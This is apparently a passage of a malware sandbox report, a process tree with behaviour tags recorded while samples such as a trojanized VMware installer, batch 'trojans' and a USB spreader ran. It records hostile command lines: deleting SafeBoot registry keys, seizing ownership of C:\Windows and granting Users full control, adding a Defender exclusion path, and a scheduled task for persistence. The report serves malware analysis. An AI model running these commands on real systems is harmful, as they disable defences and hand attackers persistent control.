- Sets desktop wallpaper using registry
- Drops file in Windows directory
- Modifies Control Panel
- System policy modification
PID:4536 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Public\Ghostroot\KillDora.bat4⤵
- Modifies registry class
PID:5700 -
C:\Windows\System32\rundll32.exeC:\Windows\System32\RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters5⤵PID:5704
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal" /f5⤵
- Impair Defenses: Safe Mode Boot
PID:3496
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlSet\Control\SafeBoot\Network" /f5⤵PID:5960
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe5⤵
- Kills process with taskkill
PID:2984
-
-
C:\Windows\explorer.exeexplorer.exe5⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
PID:5480
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5868
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /Grant Users:F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1192
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5252
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\ /Grant Users:F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5328
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6716,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6940 /prefetch:82⤵PID:5672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7500,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7044 /prefetch:82⤵PID:5788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7512,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7192 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:5084
-
-
C:\Users\Admin\Downloads\BlueScreen.exe"C:\Users\Admin\Downloads\BlueScreen.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7464,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7060 /prefetch:82⤵
- NTFS ADS
PID:6020
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Carewmr.vbs"2⤵
- NTFS ADS
PID:1368 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.avp.ru/3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4768 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd71c13cb8,0x7ffd71c13cc8,0x7ffd71c13cd84⤵PID:1488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1948 /prefetch:24⤵PID:4076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:5556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:84⤵PID:5472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:14⤵PID:2596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:14⤵PID:5368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:14⤵PID:6060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:14⤵PID:5312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:14⤵PID:1076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4168 /prefetch:14⤵PID:3028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4308 /prefetch:14⤵PID:4268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:14⤵PID:5208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:14⤵PID:6320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:14⤵PID:6512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6348 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:1120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:14⤵PID:7040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:14⤵PID:7140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:6960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:14⤵PID:6700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:14⤵PID:6292
-
-
-
-
C:\Windows\SYSTEM32\wscript.exewscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7148,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7244 /prefetch:82⤵PID:5312
-
-
C:\Windows\SYSTEM32\wscript.exewscript.exe C:\Users\Public\ghostroot\Message.vbs C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\DudleyTrojan.bat" "2⤵PID:6660
-
-
C:\Windows\SYSTEM32\wscript.exewscript.exe C:\Users\Public\ghostroot\Message.vbs C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\DudleyTrojan.bat" "2⤵PID:6508
-
-
C:\Windows\SYSTEM32\wscript.exewscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7452,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7100 /prefetch:82⤵PID:5648
-
-
C:\Windows\SYSTEM32\wscript.exewscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3556,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3996 /prefetch:22⤵PID:5476
-
-
C:\Windows\SYSTEM32\wscript.exewscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3660,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3296 /prefetch:22⤵PID:4676
-
-
C:\Windows\SYSTEM32\wscript.exewscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3268,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4156 /prefetch:22⤵PID:3788
-
-
C:\Windows\SYSTEM32\wscript.exewscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3624,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5788 /prefetch:22⤵PID:2672
-
-
C:\Windows\SYSTEM32\wscript.exewscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=4008,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5088 /prefetch:22⤵PID:6984
-
-
C:\Windows\SYSTEM32\wscript.exewscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=6284,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5852 /prefetch:22⤵PID:6376
-
-
C:\Windows\SYSTEM32\wscript.exewscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=5940,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6916 /prefetch:22⤵PID:6344
-
-
C:\Windows\SYSTEM32\wscript.exewscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=5752,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4160 /prefetch:22⤵PID:4936
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:3108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:3588
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3200
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap8420:110:7zEvent122321⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4544
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\" -ad -an -ai#7zMap19419:162:7zEvent22491⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4544
-
C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\setup.exe"C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\setup.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "XOYOX" /tr "C:\ProgramData\ChromesSoftware\XOYOX.exe"2⤵PID:5032
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "XOYOX" /tr "C:\ProgramData\ChromesSoftware\XOYOX.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2832
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\readme-en.txt1⤵
- Opens file in notepad (likely ransom note)
PID:712
-
C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\setup.exe"C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\setup.exe"1⤵
- Executes dropped EXE
PID:3596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1320
-
-
C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\setup.exe"C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\setup.exe"1⤵
- Executes dropped EXE
PID:2672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2392
-
-
C:\Users\Admin\Downloads\archive\Apex9.1\Apex.exe"C:\Users\Admin\Downloads\archive\Apex9.1\Apex.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5492
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\archive\Torrentator\Torrent Cash.pdf"1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:5608
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\archive\Torrentator\Trackers 2011.txt1⤵PID:5780
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\archive\Torrentator\READ ME.txt1⤵PID:5872
-
C:\Users\Admin\Downloads\archive\USB Spreader\USB_Spreader.exe"C:\Users\Admin\Downloads\archive\USB Spreader\USB_Spreader.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6024
-
C:\Users\Admin\Downloads\archive\QuikNEZ\QuikNEZUpdater.exe"C:\Users\Admin\Downloads\archive\QuikNEZ\QuikNEZUpdater.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2888
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\archive\QuikNEZ\readme.txt1⤵
- Opens file in notepad (likely ransom note)
PID:5436
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\archive\QuikNEZ\spreading guide.pdf"1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5528 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140432⤵
- System Location Discovery: System Language Discovery
PID:5060 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2E1FC07F8767BC0A4A54302FC4FDEAAC --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- System Location Discovery: System Language Discovery
PID:2692
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BA9B0493FB2D884ABDE49625184E0D81 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 